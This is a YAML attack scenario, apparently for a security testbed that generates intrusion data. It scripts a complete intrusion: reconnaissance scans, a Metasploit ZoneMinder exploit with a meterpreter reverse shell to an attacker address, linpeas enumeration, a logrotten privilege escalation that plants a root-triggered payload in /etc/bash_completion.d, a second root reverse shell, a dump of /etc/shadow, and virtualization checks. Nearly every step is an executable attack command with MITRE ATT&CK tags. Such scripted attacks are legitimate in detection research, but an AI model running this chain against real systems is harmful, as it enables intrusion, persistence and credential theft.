####################
#
# Scenario 1 d a
#
####################
vars:
  $SERVER_ADDRESS: 192.42.0.254
  $ATTACKER_ADDRESS: 192.42.1.174
  $DNS_SERVER: 192.42.0.233
  $ADMIN_SERVER: 10.12.0.222
  $DOMAIN: aecid-testbed.com
  $USER: aecid
  $DNS_LIST: /usr/local/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
  $SSH_KEY: {{sshkey.public_key}}

commands:
  - type: shell
    cmd: 'echo "Target:  $SSH_KEY"'

  - type: shell
    cmd: dnsenum -f $DNS_LIST --dnsserver $DNS_SERVER $DOMAIN
    metadata:
      techniques: "T1590.002,T1591"
      tactics: "Reconnaissance"
      technique_name: "Gather Victim Network Information: DNS,Gather Victim Org Information"

  - type: shell
    cmd: sudo nmap -O -sT --top-ports 100 $SERVER_ADDRESS
    metadata:
      techniques: "T1595,T1592.002"
      tactics: "Reconnaissance"
      technique_name: "Active Scanning,Gather Victim Host Information: Software

  - type: shell
    cmd: "nikto -host $SERVER_ADDRESS"
    metadata:
      techniques: "T1595.002"
      tactics: "Reconnaissance"
      technique_name: "Active Scanning: Vulnerability Scanning"

  - type: shell
    cmd: "ffuf -w /usr/local/share/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -u http://$SERVER_ADDRESS/FUZZ"
    metadata:
      techniques: "T1595.003"
      tactics: "Reconnaissance"
      technique_name: "Active Scanning: Wordlist Scanning"

  - type: msf-module
    cmd: exploit/unix/webapp/zoneminder_snapshots
    creates_session: "foothold"
    options:
      RHOSTS: 192.42.0.254
    payload_options:
      LHOST: 192.42.1.174
    payload: cmd/unix/python/meterpreter/reverse_tcp
    metadata:
      techniques: "T1190,T1059.006"
      tactics: "Initial Access"
      technique_name: "Exploit Public-Facing Application,Command and Scripting Interpreter: Python"

  - type: msf-session
    stdapi: True
    session: "foothold"
    cmd: cd /tmp
    metadata:
      techniques: "T1105"
      tactics: "Command and Control"
      technique_name: "Ingress Tool Transfer"

  - type: msf-session
    session: "foothold"
    cmd: upload /var/www/html/linpeas.sh
    metadata:
      techniques: "T1105"
      tactics: "Command and Control"
      technique_name: "Ingress Tool Transfer"

  - type: msf-session
    cmd: shell
    session: "foothold"

  - type: msf-session
    cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")";
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: export SHELL=bash
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: export TERM=xterm256-color
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: stty rows 38 columns 116
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"

  - type: msf-session
    cmd: 'export PS1="PWN >"'
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"

  - type: msf-session
    cmd: chmod +x linpeas.sh
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"

  - type: msf-session
    cmd: ./linpeas.sh -s -q -N 2> /dev/null
    session: "foothold"
    end_str: "PWN >"
    metadata:
      techniques: "T1087,T1083,T1201,T1069,T1057,T1518,T1082,T1614,T1016,T1049,T1033,T1007,T1615"
      tactics: "Discovery"
      technique_name: "Account Discovery,File and Directory Discovery,Password Policy Discover,Permission Groups Discovery,Process Discovery,Software Discovery,System Information Discovery,System Location Discovery,System Network Configuration Discovery,System Network Connections Discovery,System Owner/User Discovery,System Service Discovery,Group Policy Discovery"

  # wait a little bit for linpeas
  - type: sleep
    seconds: 380

  # This command fixes the outputbuffer
  # so that the output of the further
  # commands will work!
  - type: msf-session
    read: True
    cmd: id
    session: "foothold"
    metadata:
      techniques: "T1033"
      tactics: "Discovery"
      technique_name: "System Owner/User Discovery"

  - type: msf-session
    cmd: "cd /var/www/default"
    session: "foothold"
    metadata:
      techniques: "T1546"
      tactics: " Privilege Escalation,Persistence"

  - type: msf-session
    cmd: echo "if [ \`id -u\` -eq 0 ]; then \$( {{shellcode3333.stdout}} | sh ); fi" > payload
    session: "foothold"
    metadata:
      techniques: "T1546"
      tactics: " Privilege Escalation,Persistence"

  - type: msf-session
    cmd: "rm -rf log"
    session: "foothold"
    metadata:
      techniques: "T1546"
      tactics: " Privilege Escalation,Persistence"

  - type: msf-session
    cmd: "mkdir log"
    session: "foothold"
    metadata:
      techniques: "T1546"
      tactics: " Privilege Escalation,Persistence"

  - type: msf-session
    cmd: "echo empty > log/accesss.log"
    session: "foothold"
    metadata:
      techniques: "T1546"
      tactics: " Privilege Escalation,Persistence"

  - type: msf-session
    cmd: "./logrotten -p /var/www/default/payload /var/www/default/log/accesss.log"
    session: "foothold"
    metadata:
      techniques: "T1546"
      tactics: " Privilege Escalation,Persistence"

  - type: sleep
    seconds: 960
    metadata:
      techniques: "T1546"
      tactics: " Privilege Escalation,Persistence"

  - type: msf-session
    cmd: "id"
    read: True
    session: "foothold"

  - type: msf-session
    cmd: "cat /var/www/default/payload > /etc/bash_completion.d/accesss.log"
    session: "foothold"


  - type: ssh
    cmd: echo "ssh -i .ssh/rootkey -o StrictHostKeyChecking=no root@172.17.100.121 '. /etc/bash_completion'" | at now + 10 minute
    hostname: $ADMIN_SERVER
    username: aecid
    password: aecid
    jmp_hostname:  192.42.2.42
    exit_on_error: False

  - type: msf-module
    cmd: exploit/multi/handler
    creates_session: "root"
    payload_options:
      LHOST: "192.42.1.174"
      LPORT: "3333"
    payload: cmd/unix/python/meterpreter/reverse_tcp

  - type: msf-session
    cmd: shell
    session: "root"

  - type: msf-session
    cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")";
    session: "root"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
      
  - type: msf-session
    cmd: export SHELL=bash
    session: "root"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: export TERM=xterm256-color
    session: "root"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: stty rows 38 columns 116
    session: "root"
 
  - type: msf-session
    cmd: id
    session: "root"
    metadata:
      techniques: "T1033"
      tactics: "Discovery"
      technique_name: "System Owner/User Discovery"

  - type: msf-session
    cmd: cat /etc/shadow
    session: "root"
    metadata:
      techniques: "T1003.008"
      tactics: "Credential Access"
      technique_name: "OS Credential Dumping: /etc/passwd and /etc/shadow"

  - type: msf-session
    cmd: lspci
    session: "root"
    metadata:
      techniques: "T1120"
      tactics: "Discovery"


  - type: msf-session
    cmd: command -v lsusb
    session: "root"
    metadata:
      techniques: "T1120"
      tactics: "Discovery"

  - type: msf-session
    cmd: date
    session: "root"
    metadata:
      techniques: "T1124"
      tactics: "Discovery"

  - type: msf-session
    cmd: find /usr -name \*virtualbox\*
    session: "root"
    metadata:
      techniques: "T1497"
      tactics: "Defense Evasion, Discovery"
